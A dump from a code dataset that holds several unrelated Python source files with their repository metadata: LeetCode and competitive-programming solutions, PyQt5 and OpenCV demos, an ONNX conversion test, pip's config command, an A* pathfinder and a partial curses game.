] | pallih@kaninka.net |
661166baa4aeb5d49e0acef2a214a82c99197977 | 58afefdde86346760bea40690b1675c6639c8b84 | /leetcode/frog-position-after-t-seconds/386090832.py | 9a855ba87a746a4da2b3445c88f2d2167012e3ee | [] | no_license | ausaki/data_structures_and_algorithms | aaa563f713cbab3c34a9465039d52b853f95548e | 4f5f5124534bd4423356a5f5572b8a39b7828d80 | refs/heads/master | 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | # title: frog-position-after-t-seconds
# detail: https://leetcode.com/submissions/detail/386090832/
# datetime: Tue Aug 25 17:01:25 2020
# runtime: 100 ms
# memory: 14 MB
class Solution:
def frogPosition(self, n: int, edges: List[List[int]], t: int, target: int) -> float:
visited = {1}
g = collections.defaultdict(list)
for i, j in edges:
g[i].append(j)
g[j].append(i)
def jump(i, p, t):
l = len(g[i]) - (i != 1)
if i == target:
if l == 0 or t == 0:
return 1
else:
return 0
if t == 0:
return 0
for j in g[i]:
if j == p:
continue
prop = jump(j, i, t - 1)
if prop:
return prop / l
return 0
return jump(1, 0, t) | [
"ljm51689@gmail.com"
] | ljm51689@gmail.com |
d2738856b779dd77745eccd9ba6a256cc478cd52 | aca253ff1a97c96a1a0a9a5802aa623789662bb1 | /p036/modify_tree.py | 85501c51bdad36228626e0879d0805eb3bab30d1 | [] | no_license | KD-huhu/PyQt5 | a6128a34b93f6e2da7216d5818f66dc9614216bc | 1c33a6549c2fcf663168256553d8c24e25d9a69c | refs/heads/master | 2022-07-03T07:37:29.837547 | 2020-05-17T14:54:39 | 2020-05-17T14:54:39 | 261,768,854 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,719 | py | import sys
from PyQt5.QtWidgets import *
class ModifyTree(QWidget):
def __init__(self, parent=None):
super(ModifyTree, self).__init__(parent)
self.setWindowTitle('TreeWidget 例子')
operatorLayout = QHBoxLayout()
addBtn = QPushButton('添加节点')
updateBtn = QPushButton('修改节点')
deleteBtn = QPushButton('删除节点')
operatorLayout.addWidget(addBtn)
operatorLayout.addWidget(updateBtn)
operatorLayout.addWidget(deleteBtn)
addBtn.clicked.connect(self.addNode) # 绑定槽
updateBtn.clicked.connect(self.updateNode)
deleteBtn.clicked.connect(self.deleteNode)
self.tree = QTreeWidget() # 生成树
self.tree.setColumnCount(2)
self.tree.setHeaderLabels(['Key','Value'])
root = QTreeWidgetItem(self.tree)
root.setText(0,'root')
root.setText(1, '0')
child1 = QTreeWidgetItem(root)
child1.setText(0,'child1')
child1.setText(1,'1')
child2 = QTreeWidgetItem(root)
child2.setText(0,'child2')
child2.setText(1,'2')
child3 = QTreeWidgetItem(child2)
child3.setText(0,'child3')
child3.setText(1,'3')
self.tree.clicked.connect(self.onTreeClicked)
mainLayout = QVBoxLayout(self)
mainLayout.addLayout(operatorLayout)
mainLayout.addWidget(self.tree)
self.setLayout(mainLayout)
def onTreeClicked(self,index):
item = self.tree.currentItem()
print(index.row())
print('key=%s,value=%s' % (item.text(0),item.text(1)))
def addNode(self): # 添加节点
print('添加节点')
item = self.tree.currentItem() # 获取当前节点
print(item)
node = QTreeWidgetItem(item) # 创建节点对象,为当前节点添加子节点
node.setText(0,'新节点')
node.setText(1,'新值')
def updateNode(self):
print('修改节点')
item = self.tree.currentItem() # 对当前节点进行修改
item.setText(0,'修改节点')
item.setText(1, '值已经被修改')
def deleteNode(self):
print('删除节点')
item = self.tree.currentItem() # 当前节点
root = self.tree.invisibleRootItem() # 当根节点的父节点
for item in self.tree.selectedItems(): # 要从父节点中删除
(item.parent() or root).removeChild(item)
if __name__ == '__main__':
app = QApplication(sys.argv)
tree = ModifyTree()
tree.show()
sys.exit(app.exec_())
| [
"noreply@github.com"
] | KD-huhu.noreply@github.com |
1f5468676d551ebb3f849b542fc5defe208c8f8c | 731c3f2f85f6002725322eedc0b2c8b5e74f610e | /1-jakc/jakc_hr_schedule/models/jakc_hr_employee.py | f81455e3f0490de9f60a0733819918ac05534423 | [] | no_license | babarlhr/project-0021 | 1ac824657f893c8f25d6eb3b839051f350d7cc9d | e30b8a9f5d2147d3ca5b56b69ec5dbd22f712a91 | refs/heads/master | 2021-09-22T15:45:47.431000 | 2018-09-11T14:59:49 | 2018-09-11T14:59:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | from openerp import fields, models, api, _
from openerp.exceptions import Warning, ValidationError
import logging
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
class HrEmployee(models.Model):
_inherit = 'hr.employee'
nik = fields.Char('NIK', size=20, required=True)
| [
"wahhid@gmail.com"
] | wahhid@gmail.com |
c7a08b2e9d4d981344d5de6f125cc2b7bb211375 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02804/s852532161.py | db55ddcaa9dc897931e5c7429d31e68beae24140 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | n,k=map(int,input().split())
A=list(map(int,input().split()))
mod=10**9+7
A.sort()
def cmb(n, r, mod):
if ( r<0 or r>n ):
return 0
r = min(r, n-r)
return g1[n] * g2[r] * g2[n-r] % mod
N = 10**5
g1 = [1, 1] # 元テーブル
g2 = [1, 1] #逆元テーブル
inverse = [0, 1] #逆元テーブル計算用テーブル
for i in range( 2, N + 1 ):
g1.append( ( g1[-1] * i ) % mod )
inverse.append( ( -inverse[mod % i] * (mod//i) ) % mod )
g2.append( (g2[-1] * inverse[-1]) % mod )
ans,bns=0,0
for j in range(n-k+1):
ans=(ans+(A[n-j-1]-A[j])*cmb(n-j-1,k-1,mod))%mod
print(ans%mod) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
55adec22c2b1a4fd58bcba0728db6e2560ac8d54 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/twilio/build/lib/twilio/rest/ip_messaging/v2/__init__.py | ebd0c69459eafe129379c2b02fe69211ed1fe8af | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a7d8849526bea15c375620047af3b52bac72acf3b87db9881e9bddafd4c1c295
size 1343
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
90256ce535bb47bd3131fa27540b688141cd699c | a9305f461b2c03e4a55fec9f1ecc75f78265eb8e | /opencv/Realidade-Aumentada-master/insertObject/glyphfunctions.py | c5cdbb695347ab7fb65ec816e467b7e27d9f5fd8 | [] | no_license | JoaoBueno/estudos-python | 653afb174f2d141fcc82511c51cbfd2bca1b55cb | 606e188e88ee3a2b2e1daee60c71948c678228e1 | refs/heads/master | 2022-01-24T20:17:52.702768 | 2022-01-19T20:39:20 | 2022-01-19T20:39:20 | 150,925,137 | 2 | 2 | null | 2022-01-19T20:40:46 | 2018-09-30T03:09:08 | Python | UTF-8 | Python | false | false | 3,278 | py | import cv2
import numpy as np
def order_points(points):
s = points.sum(axis=1)
diff = np.diff(points, axis=1)
ordered_points = np.zeros((4,2), dtype="float32")
ordered_points[0] = points[np.argmin(s)]
ordered_points[2] = points[np.argmax(s)]
ordered_points[1] = points[np.argmin(diff)]
ordered_points[3] = points[np.argmax(diff)]
return ordered_points
def max_width_height(points):
(tl, tr, br, bl) = points
top_width = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
bottom_width = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
max_width = max(int(top_width), int(bottom_width))
left_height = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
right_height = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
max_height = max(int(left_height), int(right_height))
return (max_width,max_height)
def topdown_points(max_width, max_height):
return np.array([
[0, 0],
[max_width-1, 0],
[max_width-1, max_height-1],
[0, max_height-1]], dtype="float32")
def get_topdown_quad(image, src):
# src and dst points
src = order_points(src)
(max_width,max_height) = max_width_height(src)
dst = topdown_points(max_width, max_height)
# warp perspective
matrix = cv2.getPerspectiveTransform(src, dst)
warped = cv2.warpPerspective(image, matrix, max_width_height(src))
# return top-down quad
return warped
def get_glyph_pattern(image, black_threshold, white_threshold):
# collect pixel from each cell (left to right, top to bottom)
cells = []
cell_half_width = int(round(image.shape[1] / 10.0))
cell_half_height = int(round(image.shape[0] / 10.0))
row1 = cell_half_height*3
row2 = cell_half_height*5
row3 = cell_half_height*7
col1 = cell_half_width*3
col2 = cell_half_width*5
col3 = cell_half_width*7
cells.append(image[row1, col1])
cells.append(image[row1, col2])
cells.append(image[row1, col3])
cells.append(image[row2, col1])
cells.append(image[row2, col2])
cells.append(image[row2, col3])
cells.append(image[row3, col1])
cells.append(image[row3, col2])
cells.append(image[row3, col3])
# threshold pixels to either black or white
for idx, val in enumerate(cells):
if val < black_threshold:
cells[idx] = 0
elif val > white_threshold:
cells[idx] = 1
else:
return None
return cells
def get_vectors(image, points):
# order points
points = order_points(points)
# load calibration data
with np.load('R1.npz') as X:
mtx, dist, _, _ = [X[i] for i in ('mtx','dist','rvecs','tvecs')]
# set up criteria, image, points and axis
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
imgp = np.array(points, dtype="float32")
objp = np.array([[0.,0.,0.],[1.,0.,0.],[1.,1.,0.],[0.,1.,0.]], dtype="float32")
# calculate rotation and translation vectors
cv2.cornerSubPix(gray,imgp,(11,11),(-1,-1),criteria)
rvecs, tvecs, _ = cv2.solvePnPRansac(objp, imgp, mtx, dist)
return rvecs, tvecs | [
"heavyhide@gmail.com"
] | heavyhide@gmail.com |
f08bb2bf9dddb60974d27a3fbedbb68e56233d38 | 7d8e040cb703e6f6e2d55b5dc64fc9124d85dde8 | /tests/test_sklearn_gaussian_process_classifier.py | cc65cc32b1d02e64a75788f2b0aa18cd2d1849a7 | [
"MIT"
] | permissive | Global-localhost/sklearn-onnx | fc44aa481a91482f187cfd2307df6061b77742af | a8267e7ba946d8b0596951060e5dca39fec47439 | refs/heads/master | 2023-03-23T00:19:31.474251 | 2021-03-03T19:17:12 | 2021-03-03T19:17:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,957 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import unittest
from distutils.version import StrictVersion
import numpy as np
from numpy.testing import assert_almost_equal
import scipy
from onnxruntime import InferenceSession, SessionOptions
try:
from onnxruntime.capi.onnxruntime_pybind11_state import Fail as OrtFail
except ImportError:
OrtFail = RuntimeError
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn import __version__ as sklver
try:
from sklearn.gaussian_process import GaussianProcessClassifier
except ImportError:
GaussianProcessClassifier = None
from skl2onnx.common.data_types import FloatTensorType, DoubleTensorType
from skl2onnx import to_onnx
from skl2onnx.helpers.onnx_helper import change_onnx_domain
from test_utils import dump_data_and_model, TARGET_OPSET
sklver_ = ".".join(sklver.split('.')[:2])
class TestSklearnGaussianProcessClassifier(unittest.TestCase):
@classmethod
def setUpClass(cls):
try:
from ortcustomops import (
onnx_op, PyCustomOpDef, get_library_path)
except ImportError:
return
@onnx_op(op_type="SolveFloat",
inputs=[PyCustomOpDef.dt_float, PyCustomOpDef.dt_float],
outputs=[PyCustomOpDef.dt_float])
def solveopf(a, b):
# The user custom op implementation here.
return scipy.linalg.solve(a, b).astype(np.float32)
@onnx_op(op_type="SolveDouble",
inputs=[PyCustomOpDef.dt_double, PyCustomOpDef.dt_double],
outputs=[PyCustomOpDef.dt_double])
def solveopd(a, b):
# The user custom op implementation here.
return scipy.linalg.solve(a, b).astype(np.float64)
cls.path = get_library_path()
def fit_classification_model(self, gp, n_classes=2):
data = load_iris()
X, y = data.data, data.target
if n_classes == 2:
y = y % 2
elif n_classes != 3:
raise NotImplementedError("n_classes must be 2 or 3")
X_train, X_test, y_train, y_test = train_test_split(
X, y, random_state=3)
gp.fit(X_train, y_train)
return gp, X_test.astype(np.float32)
def common_test_gpc(self, dtype=np.float32, n_classes=2):
gp = GaussianProcessClassifier()
gp, X = self.fit_classification_model(gp, n_classes=n_classes)
# return_cov=False, return_std=False
if dtype == np.float32:
cls = FloatTensorType
else:
cls = DoubleTensorType
model_onnx = to_onnx(
gp, initial_types=[('X', cls([None, None]))],
target_opset=TARGET_OPSET,
options={GaussianProcessClassifier: {
'zipmap': False, 'optim': 'cdist'}})
self.assertTrue(model_onnx is not None)
try:
sess = InferenceSession(model_onnx.SerializeToString())
except OrtFail:
if not hasattr(self, 'path'):
return
suffix = 'Double' if dtype == np.float64 else 'Float'
# Operator Solve is missing
model_onnx = change_onnx_domain(
model_onnx, {'Solve': ('Solve%s' % suffix, 'ai.onnx.contrib')})
so = SessionOptions()
so.register_custom_ops_library(self.path)
sess = InferenceSession(model_onnx.SerializeToString(), so)
res = sess.run(None, {'X': X.astype(dtype)})
assert_almost_equal(res[0].ravel(), gp.predict(X).ravel())
assert_almost_equal(res[1], gp.predict_proba(X),
decimal=3)
return
dt = 32 if dtype == np.float32 else 64
dump_data_and_model(
X.astype(dtype), gp, model_onnx, verbose=False,
basename="SklearnGaussianProcessRBFT%d%d" % (n_classes, dt))
@unittest.skipIf(TARGET_OPSET < 12, reason="einsum")
@unittest.skipIf(GaussianProcessClassifier is None,
reason="scikit-learn is too old")
@unittest.skipIf(StrictVersion(sklver_) < StrictVersion("0.22"),
reason="not available")
def test_gpc_float_bin(self):
self.common_test_gpc(dtype=np.float32)
@unittest.skipIf(TARGET_OPSET < 12, reason="einsum, reciprocal")
@unittest.skipIf(GaussianProcessClassifier is None,
reason="scikit-learn is too old")
@unittest.skipIf(StrictVersion(sklver_) < StrictVersion("0.22"),
reason="not available")
def test_gpc_double_bin(self):
self.common_test_gpc(dtype=np.float64)
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | Global-localhost.noreply@github.com |
c1c6e061d4012ce3011878e9be9c295ead79c428 | a7dad581abcc74dd191754268131ff2ebef060fc | /fabfile.py | f16c5d1bf778c9e64bfdc2d6b25d034fd7a36380 | [] | no_license | jeremyjbowers/can-i-vote | 5eeba4c82ab1a1f6fe94b6baaec691ecc82eea4a | 2388b285387f59e271759d3fa71c6831b7414b38 | refs/heads/master | 2020-05-16T22:25:58.515072 | 2012-10-07T19:04:24 | 2012-10-07T19:04:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 446 | py | #!/usr/bin/env python
from fabric.api import *
"""
Base configuration
"""
env.project_name = 'vote'
env.user = 'root'
env.repo_path = '/home/canivote/can-i-vote/%(project_name)s' % env
"""
Environments
"""
def prod():
env.hosts = ['198.61.200.10']
"""
Commands
"""
def git_pull(release):
with cd(env.repo_path):
run('git pull origin %s' % release)
def restart():
with cd(env.repo_path):
run('utils/restart_gunicorn.sh') | [
"jeremyjbowers@gmail.com"
] | jeremyjbowers@gmail.com |
05a4f511f05f4671e829cce55a8c86fcf668af92 | 05b24701576cc5d470b6ab49b25f966d3764c2d2 | /venv/Lib/site-packages/pip/_internal/commands/configuration.py | 31e040923ccea0d7396b56a98efd233422e4771f | [
"MIT"
] | permissive | taneemishere/Spam-Comment-Detector | e80d27cdc679ad55a774052c9fa8f897fe38a514 | b0c75cc00ef584a571ab1b2b579a6016b3504792 | refs/heads/main | 2023-01-24T01:06:57.299863 | 2020-11-14T05:29:58 | 2020-11-14T05:29:58 | 305,711,846 | 2 | 1 | MIT | 2020-11-12T07:03:38 | 2020-10-20T13:10:41 | Jupyter Notebook | UTF-8 | Python | false | false | 8,168 | py | import logging
import os
import subprocess
from pip._internal.cli.base_command import Command
from pip._internal.cli.status_codes import ERROR, SUCCESS
from pip._internal.configuration import (
Configuration, get_configuration_files, kinds,
)
from pip._internal.exceptions import PipError
from pip._internal.utils.deprecation import deprecated
from pip._internal.utils.misc import get_prog
from pip._internal.utils.virtualenv import running_under_virtualenv
logger = logging.getLogger(__name__)
class ConfigurationCommand(Command):
"""Manage local and global configuration.
Subcommands:
list: List the active configuration (or from the file specified)
edit: Edit the configuration file in an editor
get: Get the value associated with name
set: Set the name=value
unset: Unset the value associated with name
If none of --user, --global and --site are passed, a virtual
environment configuration file is used if one is active and the file
exists. Otherwise, all modifications happen on the to the user file by
default.
"""
name = 'config'
usage = """
%prog [<file-option>] list
%prog [<file-option>] [--editor <editor-path>] edit
%prog [<file-option>] get name
%prog [<file-option>] set name value
%prog [<file-option>] unset name
"""
summary = "Manage local and global configuration."
def __init__(self, *args, **kwargs):
super(ConfigurationCommand, self).__init__(*args, **kwargs)
self.configuration = None
self.cmd_opts.add_option(
'--editor',
dest='editor',
action='store',
default=None,
help=(
'Editor to use to edit the file. Uses VISUAL or EDITOR '
'environment variables if not provided.'
)
)
self.cmd_opts.add_option(
'--global',
dest='global_file',
action='store_true',
default=False,
help='Use the system-wide configuration file only'
)
self.cmd_opts.add_option(
'--user',
dest='user_file',
action='store_true',
default=False,
help='Use the user configuration file only'
)
self.cmd_opts.add_option(
'--site',
dest='site_file',
action='store_true',
default=False,
help='Use the current environment configuration file only'
)
self.cmd_opts.add_option(
'--venv',
dest='venv_file',
action='store_true',
default=False,
help=(
'[Deprecated] Use the current environment configuration '
'file in a virtual environment only'
)
)
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
handlers = {
"list": self.list_values,
"edit": self.open_in_editor,
"get": self.get_name,
"set": self.set_name_value,
"unset": self.unset_name
}
# Determine action
if not args or args[0] not in handlers:
logger.error("Need an action ({}) to perform.".format(
", ".join(sorted(handlers)))
)
return ERROR
action = args[0]
# Determine which configuration files are to be loaded
# Depends on whether the command is modifying.
try:
load_only = self._determine_file(
options, need_value=(action in ["get", "set", "unset", "edit"])
)
except PipError as e:
logger.error(e.args[0])
return ERROR
# Load a new configuration
self.configuration = Configuration(
isolated=options.isolated_mode, load_only=load_only
)
self.configuration.load()
# Error handling happens here, not in the action-handlers.
try:
handlers[action](options, args[1:])
except PipError as e:
logger.error(e.args[0])
return ERROR
return SUCCESS
def _determine_file(self, options, need_value):
# Convert legacy venv_file option to site_file or error
if options.venv_file and not options.site_file:
if running_under_virtualenv():
options.site_file = True
deprecated(
"The --venv option has been deprecated.",
replacement="--site",
gone_in="19.3",
)
else:
raise PipError(
"Legacy --venv option requires a virtual environment. "
"Use --site instead."
)
file_options = [key for key, value in (
(kinds.USER, options.user_file),
(kinds.GLOBAL, options.global_file),
(kinds.SITE, options.site_file),
) if value]
if not file_options:
if not need_value:
return None
# Default to user, unless there's a site file.
elif any(
os.path.exists(site_config_file)
for site_config_file in get_configuration_files()[kinds.SITE]
):
return kinds.SITE
else:
return kinds.USER
elif len(file_options) == 1:
return file_options[0]
raise PipError(
"Need exactly one file to operate upon "
"(--user, --site, --global) to perform."
)
def list_values(self, options, args):
self._get_n_args(args, "list", n=0)
for key, value in sorted(self.configuration.items()):
logger.info("%s=%r", key, value)
def get_name(self, options, args):
key = self._get_n_args(args, "get [name]", n=1)
value = self.configuration.get_value(key)
logger.info("%s", value)
def set_name_value(self, options, args):
key, value = self._get_n_args(args, "set [name] [value]", n=2)
self.configuration.set_value(key, value)
self._save_configuration()
def unset_name(self, options, args):
key = self._get_n_args(args, "unset [name]", n=1)
self.configuration.unset_value(key)
self._save_configuration()
def open_in_editor(self, options, args):
editor = self._determine_editor(options)
fname = self.configuration.get_file_to_edit()
if fname is None:
raise PipError("Could not determine appropriate file.")
try:
subprocess.check_call([editor, fname])
except subprocess.CalledProcessError as e:
raise PipError(
"Editor Subprocess exited with exit code {}"
.format(e.returncode)
)
def _get_n_args(self, args, example, n):
"""Helper to make sure the command got the right number of arguments
"""
if len(args) != n:
msg = (
'Got unexpected number of arguments, expected {}. '
'(example: "{} config {}")'
).format(n, get_prog(), example)
raise PipError(msg)
if n == 1:
return args[0]
else:
return args
def _save_configuration(self):
# We successfully ran a modifying command. Need to save the
# configuration.
try:
self.configuration.save()
except Exception:
logger.error(
"Unable to save configuration. Please report this as a bug.",
exc_info=1
)
raise PipError("Internal Error.")
def _determine_editor(self, options):
if options.editor is not None:
return options.editor
elif "VISUAL" in os.environ:
return os.environ["VISUAL"]
elif "EDITOR" in os.environ:
return os.environ["EDITOR"]
else:
raise PipError("Could not determine editor to use.")
| [
"taneemishere@gmail.com"
] | taneemishere@gmail.com |
f358510396aee7aceb8657337137844f32866b6c | dc760b9503033b97457702f5c0d64ba6beb52d37 | /tests/blueprints/test_documents.py | 39417b5f3244fadf8188d949fd91cc5d01bc5c9d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | agdsn/sipa | 1862fa5f5764a6cb3ab866df724b6b9adeadbfe4 | 5e82221041de1b08129ed43f9f6036c541e2683d | refs/heads/develop | 2023-06-08T23:04:31.054933 | 2023-05-28T11:43:31 | 2023-05-28T11:43:31 | 33,961,711 | 23 | 18 | MIT | 2023-09-11T22:32:43 | 2015-04-14T23:09:34 | Python | UTF-8 | Python | false | false | 746 | py | import pytest
from tests.assertions import TestClient
@pytest.fixture(scope="module")
def client(module_test_client):
return module_test_client
def test_restriced_area(client: TestClient):
with client.renders_template("login.html"):
resp = client.assert_url_ok(
"/documents_restricted/fake-doc/", follow_redirects=True
)
assert len(resp.history) == 1
assert resp.history[0].location.startswith("/login?")
@pytest.mark.usefixtures("user_logged_in")
def test_restricted_area_logged_in(client: TestClient):
client.assert_url_response_code("/documents_restricted/fake-doc/", 404)
def test_unrestricted_area(client: TestClient):
client.assert_url_response_code("/documents/fake-doc/", 404)
| [
"lukas.juhrich@agdsn.de"
] | lukas.juhrich@agdsn.de |
f631f0ad314cc54e012f56dd0631e587b44f8930 | dd449ad8388847779b265f49f2339c9681376c60 | /a_star_algo/algo.py | 2d3e0aea892a843f490f31666f9a20dbc5402a30 | [] | no_license | whoji/training-ground | 478d76a8c274050eb910b28729ca1d1cdb47eae9 | b107cc47c4a04bb8868c410ab207bacab5a86e4c | refs/heads/master | 2020-05-16T16:13:26.788156 | 2019-12-04T01:56:01 | 2019-12-04T01:56:01 | 183,154,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,369 | py | # https://medium.com/@nicholas.w.swift/easy-a-star-pathfinding-7e6689c7f7b2
class Node():
"""A node class for A* Pathfinding"""
def __init__(self, parent=None, position=None):
self.parent = parent
self.position = position
self.g = 0 # G is the distance between the current node and the start node.
self.h = 0. # H is the heuristic - estimated distance from the current node to the end node.
# using the Eucleandian distance squared : a2 + b2 = c2
self.f = 0. # F is the total cost of the node.
def __eq__(self, other):
return self.position == other.position
def get_node_with_smallest_f(open_list):
assert open_list != []
current_node = open_list[0]
current_index = 0
for index, item in enumerate(open_list):
if item.f < current_node.f:
current_node = item
current_index = index
return current_node, current_index
def get_path_to_node(current_node):
path = []
current = current_node
while current is not None:
path.append(current.position)
current = current.parent
return path[::-1] # Return reversed path
def get_children_nodes(current_node, maze):
# get all the children / neighbors
children = []
for new_position in [(0, -1), (0, 1), (-1, 0), (1, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)]:
# Adjacent squares
node_position = (current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])
if node_position[0] > (len(maze) - 1) or node_position[0] < 0 or node_position[1] > (len(maze[len(maze)-1]) -1) or node_position[1] < 0:
continue
if maze[node_position[0]][node_position[1]] != 0:
continue
new_node = Node(current_node, node_position)
children.append(new_node)
return children
def AStar(maze, start, end):
# Returns a list of tuples as a path from the
# given start to the given end in the given maze
# Create start and end node
start_node = Node(None, start)
start_node.g = start_node.h = start_node.f = 0
end_node = Node(None, end)
end_node.g = end_node.h = end_node.f = 0
# Initialize both open and closed list
open_list = [] # like a frontier
closed_list = [] # like where we camre from
# Add the start node
open_list.append(start_node)
# Loop until you find the end
while len(open_list) > 0:
# Get the current node
current_node, current_index = get_node_with_smallest_f(open_list)
# Pop current off open list, add to closed list
open_list.pop(current_index)
closed_list.append(current_node)
# Found the goal
if current_node == end_node:
# print("DONE")
return get_path_to_node(current_node)
children = get_children_nodes(current_node, maze)
children = [c for c in children if c not in closed_list]
for child in children:
child.g = current_node.g + 1
child.h = ((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)
child.f = child.g + child.h
for open_node in open_list:
if child == open_node and child.g > open_node.g:
continue
open_list.append(child) | [
"minli1985@gmail.com"
] | minli1985@gmail.com |
d680f8875b14ff6b14fad6a3d87412f63c377f03 | 2dd0082221239fef0e0894c852f70f1eaeb62b9e | /Assignments/pete/python/curses/curses8/curses7.py | 58231c63220cd044d2e1c7060580b9eaab06acdc | [] | no_license | pjz987/2019-10-28-fullstack-night | 03097cf3dc24aeec0c326044bb0fc99385fbc333 | 4c643013de73f08d7503d62ec602d6a5c80ffa7e | refs/heads/master | 2022-11-11T19:40:00.296645 | 2020-06-25T16:14:47 | 2020-06-25T16:14:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,750 | py | import argparse
import curses
parser = argparse.ArgumentParser()
parser.add_argument('-lvl', action='store', dest='version_arg', type=int)
parsed_args = parser.parse_args()
LEVEL = parsed_args.version_arg or 1
import random
import time
'''
Above argparse and curses are imported and set up.#and numpy
Below I will establish the Classes before getting into the different LEVELs.
'''
class Sprite():
def __init__(self, y, x, uni):
self.y = y
self.x = x
self.uni = uni
def __str__(self):
return self.uni
class Item(Sprite):
def __init__(self, y, x, uni, id, uses, range):
super().__init__(y, x, uni)
self.id = id
self.uses = uses
self.range = range
def __repr__(self):
return f"{self.uni}:{self.uses}/{self.range}"
class Character(Sprite):
def __init__(self, y, x, uni, uni2):
super().__init__(y, x, uni)
self.uni2 = uni2
self.inv = []
def __str__(self):
return self.uni#, self.uni2
def mouth_string(self):
return self.uni2
def move(self, direction, steps):
# change the y/x position of the character
pass
def attack(self, direction, weapon):
#attack and everything
pass
hero = Character(13, 46, '{00}', '-__-')
enemies = [
Character(1, 96, '|><|', '|==|'),
Character(7, 26, '|><|', '|==|'),
Character(10, 61, '|><|', '|==|'),
Character(13, 41, '|><|', '|==|'),
]
def gen_enemies(hero, enemies, num=4):
tiles = []
# [tiles.append(coord) for ]
for y in range(23):
for x in range(97):
if y % 3 == 1 and x % 5 == 1:
tiles.append((y, x))
tiles.remove((hero.y, hero.x))
for i in range(num):
co_ord = random.choice(tiles)
y = co_ord[0]
x = co_ord[1]
enemy = Character(y, x, '|><|', '|==|')
enemies.append(enemy)
tiles.remove((co_ord))
return tiles
enemies = []
enemies_num = random.randrange(3, 7)
tiles = gen_enemies(hero, enemies, enemies_num)
def gen_items(item_attr_list, tiles, num=3):
items = []
for i in range(num):
co_ord = random.choice(tiles)
tiles.remove(co_ord)
y = co_ord[0]
x = co_ord[1]
item_attr = random.choice(item_attr_list)
item = Item(y, x, item_attr[0], item_attr[1], item_attr[2], item_attr[3])
items.append(item)
return items
# items = [
# Item(20, 16, '🏹', 'bow'),
# Item(19, 5, '🔫', 'gun')
# ]
item_attr_list = [
('🏹', 'bow', 1, 10),
('🗡', 'sword', 3, 1),
('🔫', 'gun', 2, 5)
]
items_num = random.randrange(2, 5)
items = gen_items(item_attr_list, tiles, items_num)
unicode_storage_list = ['🗡', '⚔', '🔫', '🏹', '🛡', '🔑', '🗝', '❤', '☠', '☠', '⬆', '➡', '⬇', '⬅']
moves = [[0, 1], [0, -1], [1, 0], [-1, 0]]
key_list = ['KEY_UP', 'KEY_DOWN', 'KEY_RIGHT', 'KEY_LEFT']
def fix_pos(sprite): #converted this from function to method
if sprite.y < 1:
sprite.y = 1
if sprite.y > 22:
sprite.y = 22
if sprite.x < 1:
sprite.x = 1
if sprite.x > 96:
sprite.x = 96
def aim(hero, wasd):#converted
if wasd == 'w':
game_screen.addstr(hero.y - 1, hero.x, '⬆')
elif wasd == 'a':
game_screen.addstr(hero.y, hero.x - 1, '⬅')
elif wasd == 's':
game_screen.addstr(hero.y + 1, hero.x, '⬇')
elif wasd == 'd':
game_screen.addstr(hero.y, hero.x + 2, '➡')
draw_screen(hero, enemies, items, game_screen)
def shoot(hero, enemies, aim_dir, game_screen):#converted
if hero.inv:
for enemy in enemies:
if (aim_dir == 'w' and hero.x == enemy.x and hero.y > enemy.y) or (aim_dir == 'a' and hero.y == enemy.y and hero.x > enemy.x) or (aim_dir == 's' and hero.x == enemy.x and hero.y < enemy.y) or (aim_dir == 'd' and hero.y == enemy.y and hero.x < enemy.x):
enemy.uni = '☠'
draw_screen(hero, enemies, items, game_screen)
time.sleep(1)
enemies.remove(enemy)
hero.inv[0].uses -= 1
if hero.inv[0].uses == 0:
hero.inv.remove(hero.inv[0])
def enemy_move(hero, enemies):
for enemy in enemies:
y_or_x = random.choice(['y', 'x'])
if enemy.y == hero.y:
y_or_x = 'x'
elif enemy.x == hero.x:
y_or_x = 'y'
